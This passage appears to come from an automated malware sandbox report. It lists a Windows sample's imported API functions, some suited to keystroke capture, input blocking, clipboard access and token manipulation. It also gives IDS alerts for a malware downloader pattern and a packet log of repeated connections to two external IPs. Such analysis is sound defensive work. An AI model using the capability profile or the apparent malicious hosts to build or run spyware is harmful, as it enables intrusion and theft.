                                                  USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                  GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                  ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                  ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                  OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishGreat Britain
                                                  EnglishUnited States

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-09-18T15:26:04.128767+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749699132.226.8.16980TCP
                                                  2024-09-18T15:26:05.113363+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749699132.226.8.16980TCP
                                                  2024-09-18T15:26:05.694557+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749701188.114.96.3443TCP
                                                  2024-09-18T15:26:06.597534+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749702132.226.8.16980TCP
                                                  2024-09-18T15:26:07.306113+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749703188.114.96.3443TCP
                                                  2024-09-18T15:26:09.776818+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749705188.114.96.3443TCP
                                                  2024-09-18T15:26:11.401270+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749707188.114.96.3443TCP
                                                  2024-09-18T15:26:15.101822+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749711188.114.96.3443TCP
                                                  2024-09-18T15:26:17.097628+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749713132.226.8.16980TCP
                                                  2024-09-18T15:26:17.610438+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749715188.114.96.3443TCP
                                                  2024-09-18T15:26:18.050710+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749713132.226.8.16980TCP
                                                  2024-09-18T15:26:18.618702+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749719188.114.96.3443TCP
                                                  2024-09-18T15:26:19.628818+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749722132.226.8.16980TCP
                                                  2024-09-18T15:26:20.863212+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749723188.114.96.3443TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 18, 2024 15:26:01.913141966 CEST4969980192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:01.919121981 CEST8049699132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:01.919199944 CEST4969980192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:01.919477940 CEST4969980192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:01.925282955 CEST8049699132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:03.721055031 CEST8049699132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:03.773596048 CEST4969980192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:03.776456118 CEST4969980192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:03.781392097 CEST8049699132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:04.072740078 CEST8049699132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:04.119626999 CEST49700443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:04.119729996 CEST44349700188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:04.119813919 CEST49700443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:04.127438068 CEST49700443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:04.127475023 CEST44349700188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:04.128767014 CEST4969980192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:04.599597931 CEST44349700188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:04.599689960 CEST49700443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:04.610685110 CEST49700443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:04.610755920 CEST44349700188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:04.611150026 CEST44349700188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:04.660022974 CEST49700443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:04.668967962 CEST49700443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:04.711405993 CEST44349700188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:04.789135933 CEST44349700188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:04.789231062 CEST44349700188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:04.789285898 CEST49700443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:04.795799971 CEST49700443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:04.800056934 CEST4969980192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:04.805105925 CEST8049699132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:05.072067022 CEST8049699132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:05.079339981 CEST49701443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:05.079396963 CEST44349701188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:05.079518080 CEST49701443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:05.079756021 CEST49701443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:05.079777002 CEST44349701188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:05.113363028 CEST4969980192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:05.544203043 CEST44349701188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:05.546488047 CEST49701443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:05.546521902 CEST44349701188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:05.694530964 CEST44349701188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:05.694612980 CEST44349701188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:05.694911957 CEST49701443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:05.695193052 CEST49701443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:05.698904991 CEST4970280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:05.698905945 CEST4969980192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:05.704015017 CEST8049699132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:05.704106092 CEST4969980192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:05.704180002 CEST8049702132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:05.704499006 CEST4970280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:05.704499006 CEST4970280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:05.709315062 CEST8049702132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:06.548098087 CEST8049702132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:06.549506903 CEST49703443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:06.549591064 CEST44349703188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:06.549664021 CEST49703443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:06.549961090 CEST49703443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:06.549998045 CEST44349703188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:06.597533941 CEST4970280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:07.028172016 CEST44349703188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:07.037805080 CEST49703443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:07.037858963 CEST44349703188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:07.306087017 CEST44349703188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:07.306160927 CEST44349703188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:07.306221008 CEST49703443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:07.306724072 CEST49703443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:07.310862064 CEST4970480192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:07.315830946 CEST8049704132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:07.315902948 CEST4970480192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:07.315989017 CEST4970480192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:07.321230888 CEST8049704132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:09.107950926 CEST8049704132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:09.145845890 CEST49705443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:09.145910025 CEST44349705188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:09.146002054 CEST49705443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:09.146317959 CEST49705443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:09.146332979 CEST44349705188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:09.160063028 CEST4970480192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:09.621494055 CEST44349705188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:09.623409033 CEST49705443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:09.623435020 CEST44349705188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:09.776846886 CEST44349705188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:09.776930094 CEST44349705188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:09.777054071 CEST49705443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:09.777625084 CEST49705443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:09.780941010 CEST4970480192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:09.782025099 CEST4970680192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:09.786035061 CEST8049704132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:09.786102057 CEST4970480192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:09.786828995 CEST8049706132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:09.786884069 CEST4970680192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:09.786983013 CEST4970680192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:09.791745901 CEST8049706132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:10.813437939 CEST8049706132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:10.814948082 CEST49707443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:10.815042019 CEST44349707188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:10.815165997 CEST49707443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:10.815479994 CEST49707443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:10.815517902 CEST44349707188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:10.863193989 CEST4970680192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:11.270773888 CEST44349707188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:11.273055077 CEST49707443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:11.273156881 CEST44349707188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:11.401256084 CEST44349707188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:11.401336908 CEST44349707188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:11.401518106 CEST49707443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:11.401911974 CEST49707443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:11.405230045 CEST4970680192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:11.405817986 CEST4970880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:11.410656929 CEST8049706132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:11.410729885 CEST4970680192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:11.410765886 CEST8049708132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:11.410830021 CEST4970880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:11.410947084 CEST4970880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:11.415971041 CEST8049708132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:12.510083914 CEST8049708132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:12.511318922 CEST49709443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:12.511368036 CEST44349709188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:12.511442900 CEST49709443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:12.511719942 CEST49709443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:12.511732101 CEST44349709188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:12.550700903 CEST4970880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:12.975898981 CEST44349709188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:12.977672100 CEST49709443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:12.977684975 CEST44349709188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:13.104192972 CEST44349709188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:13.104299068 CEST44349709188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:13.104377031 CEST49709443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:13.104904890 CEST49709443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:13.108138084 CEST4970880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:13.109373093 CEST4971080192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:13.113418102 CEST8049708132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:13.113487959 CEST4970880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:13.114360094 CEST8049710132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:13.114458084 CEST4971080192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:13.114567041 CEST4971080192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:13.122719049 CEST8049710132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:14.195511103 CEST8049710132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:14.218344927 CEST49711443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:14.218377113 CEST44349711188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:14.218430996 CEST49711443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:14.218949080 CEST49711443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:14.218962908 CEST44349711188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:14.240761995 CEST4971080192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:14.955544949 CEST44349711188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:14.958029032 CEST49711443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:14.958050013 CEST44349711188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:15.101814032 CEST44349711188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:15.101902008 CEST44349711188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:15.102173090 CEST49711443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:15.102828026 CEST49711443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:15.106098890 CEST4971080192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:15.107338905 CEST4971280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:15.115019083 CEST8049710132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:15.115080118 CEST4971080192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:15.116892099 CEST8049712132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:15.116959095 CEST4971280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:15.117073059 CEST4971280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:15.124959946 CEST8049712132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:15.704370022 CEST4971380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:15.709445000 CEST8049713132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:15.709527969 CEST4971380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:15.709748983 CEST4971380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:15.714793921 CEST8049713132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:16.720835924 CEST8049713132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:16.724096060 CEST4971380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:16.729343891 CEST8049713132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:16.954744101 CEST8049712132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:16.975975990 CEST49715443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:16.976006985 CEST44349715188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:16.976092100 CEST49715443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:16.988676071 CEST49715443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:16.988697052 CEST44349715188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:17.003818035 CEST4971280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:17.050405025 CEST8049713132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:17.084290028 CEST49716443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:17.084321976 CEST44349716188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:17.084403992 CEST49716443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:17.088267088 CEST49716443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:17.088284969 CEST44349716188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:17.097628117 CEST4971380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:17.462141991 CEST44349715188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:17.464144945 CEST49715443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:17.464163065 CEST44349715188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:17.562202930 CEST44349716188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:17.562361956 CEST49716443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:17.564212084 CEST49716443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:17.564227104 CEST44349716188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:17.564726114 CEST44349716188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:17.610549927 CEST44349715188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:17.610794067 CEST44349715188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:17.610856056 CEST49715443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:17.611131907 CEST49715443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:17.613276958 CEST49716443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:17.614378929 CEST4971280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:17.614900112 CEST49716443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:17.615294933 CEST4971880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:17.620424032 CEST8049718132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:17.620492935 CEST4971880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:17.620553017 CEST8049712132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:17.620596886 CEST4971280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:17.620682001 CEST4971880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:17.625565052 CEST8049718132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:17.655401945 CEST44349716188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:17.728099108 CEST44349716188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:17.728349924 CEST44349716188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:17.728403091 CEST49716443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:17.731441975 CEST49716443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:17.734843016 CEST4971380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:17.739734888 CEST8049713132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:18.010059118 CEST8049713132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:18.013021946 CEST49719443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:18.013052940 CEST44349719188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:18.013112068 CEST49719443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:18.013581991 CEST49719443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:18.013600111 CEST44349719188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:18.050709963 CEST4971380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:18.474065065 CEST44349719188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:18.475800037 CEST49719443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:18.475822926 CEST44349719188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:18.618757010 CEST44349719188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:18.618985891 CEST44349719188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:18.619075060 CEST49719443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:18.619400024 CEST49719443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:18.623307943 CEST4971380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:18.625104904 CEST4972280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:18.630573988 CEST8049713132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:18.630636930 CEST4971380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:18.630928040 CEST8049722132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:18.630986929 CEST4972280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:18.631155968 CEST4972280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:18.636043072 CEST8049722132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:19.577594995 CEST8049722132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:19.578682899 CEST49723443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:19.578726053 CEST44349723188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:19.578813076 CEST49723443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:19.579135895 CEST49723443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:19.579150915 CEST44349723188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:19.628818035 CEST4972280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:20.705919981 CEST8049718132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:20.706355095 CEST8049718132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:20.706764936 CEST8049718132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:20.706886053 CEST4971880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:20.706886053 CEST4971880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:20.707139015 CEST49724443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:20.707182884 CEST44349724188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:20.707251072 CEST49724443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:20.707479954 CEST49724443192.168.2.7188.114.96.3
